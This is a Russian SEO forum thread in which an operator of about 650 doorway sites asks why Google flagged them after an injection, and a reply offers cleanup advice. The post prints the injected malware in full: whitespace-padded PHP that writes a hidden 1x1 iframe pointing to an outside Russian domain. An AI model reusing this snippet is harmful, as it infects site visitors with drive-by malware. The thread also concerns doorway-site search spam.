X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Помогите разобратся
kesn
kesn
Topic Starter сообщение 22.1.2013, 15:20; Ответить: kesn
Сообщение #1


Топовый постер
*******


Группа: Active User
Сообщений: 5090
Регистрация: 20.9.2008
Из: опринозин
Поблагодарили: 1984 раза
Репутация:   479  


Мужики подскажите че делать, гугл все доры поблакировал.
Везде в серпе Предупреждение - посещение этого сайта может нанести вред Вашему компьютеру!
650 дорвеев пострадали, код ниже я его выложил. Трафф с 25к в сутки упал до 3 человек, охренеть...
На всех дорах пишет что вирус вызывался с тдски, точнее с хтаккса где была размещена дрянь.
Вот пример моего сайта нулячего где размещена эта дрянь http://emcala.com/


Безопасный просмотр
Страница диагностики для blabla.com

Занесен ли сайт blabla.com в список подозрительных?

Сайт занесен в список подозрительных. Посещение этого сайта может нанести вред вашему компьютеру.

В некоторой части этого сайта за последние 90 дней была замечена подозрительная активность (число таких случаев: 1).

Что произошло во время последнего посещения этого сайта компанией Google?
На 0 из 3 страниц сайта, протестированных нами за последние 90 дней, происходила загрузка и установка вредоносного ПО без согласия пользователя. Последнее посещение этого сайта системой Google произошло 2013-01-21; последний раз подозрительный контент был обнаружен на этом сайте 2013-01-21.

Вредоносное ПО включает 656 exploit(s).

Сетей, в которых размещался этот сайт: 1 (в том числе (CAMELHOST)).

Был ли этот сайт промежуточным звеном в дальнейшем распространении вредоносного ПО?

По всей видимости, за последние 90 дней сайт blabla.com использовался в качестве промежуточного звена для заражения других сайтов. Число зараженных сайтов: 48 (в том числе site1.by/, site2.com/, site3.us/).

Размещалось ли на этом сайте вредоносное ПО?

Да. За последние 90 дней на этом сайте размещалось вредоносное ПО. Число зараженных им доменов: 48 (в том числе site2.com/, site1.us/, site3.com/).



Вот такая дрянь размещена в хтаксе и почти во всех файлах тдски расширения php, html:



#e2aa4e#
                                                                                                                                                                                                                                                          echo "                                                                                                                                                                                                                                                          <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                          (function () {    var zzf = document.createElement('iframe');    zzf.src = 'http://sumjecyg.ru/count15.php';    zzf.style.position = 'absolute';    zzf.style.border = '0';    zzf.style.height = '1px';    zzf.style.width = '1px';    zzf.style.left = '1px';    zzf.style.top = '1px';    if (!document.getElementById('zzf')) {        document.write('<div id=\'zzf\'></div>');        document.getElementById('zzf').appendChild(zzf);    }})();</script>";

#/e2aa4e#



А скрипт вызывался с файла share42.js

http://whoistory.com/2012/12/22/ домен http://sumjecyg.ru/ на котором стоит крипт был зареган недавно, вот м*даки, весь биз подосрали.

Дрянь эту я везде поубирал впринципе, перенес доры на другой серв, как долго теперь ждать когда это предупреждение уберется и уберется ли оно вообще?

.

Сообщение отредактировал kesn - 22.1.2013, 14:59


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ne0n
ne0n
сообщение 24.1.2013, 18:54; Ответить: ne0n
Сообщение #2


Новичок
*

Группа: Viewer
Сообщений: 1
Регистрация: 22.7.2010
Поблагодарили: 0 раз
Репутация:   0  


Сталкивался на обычных проектах (не дорвеях), если все вычистили, то предупреждения исчезнут после очередной проверки ПС (не больше 3х дней вроде у Гугл у меня было).

P.S. По #e2aa4e# предположу, что скорее всего у вас вредоносное ПО увело пароли от FTP и по FTP обновило файлы. Возможно повторится такое и на другом сервере. Поищите у себя на компьютере(ах) вирусы от куда ходите по FTP на сервер. Но это конечно не 100%, может так помечает свой код не только такое ПО.

Сообщение отредактировал ne0n - 24.1.2013, 19:04
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Помогите выбрать программу
Помогите выбрать программу
11 impak 1347 11.12.2017, 13:11
автор: Mikki
Открытая тема (нет новых ответов) Помогите найти плагин на WP
Отзывы с профилей соц сетей
1 SEOMR 441 30.11.2017, 7:18
автор: Nell
Открытая тема (нет новых ответов) Помогите найти проблему
Долгий ответ сервера
6 maxim1249 694 29.11.2017, 17:27
автор: genjnat
Открытая тема (нет новых ответов) Помогите оценить новотник. Плиз
1 Alex-777 527 29.11.2017, 7:18
автор: grumdas
Открытая тема (нет новых ответов) Помогите с неймингом для сборника советов
советы по разработки и жизни
11 coremission 1885 15.11.2017, 22:23
автор: rogefer


 



RSS Текстовая версия Сейчас: 16.12.2017, 9:41
Дизайн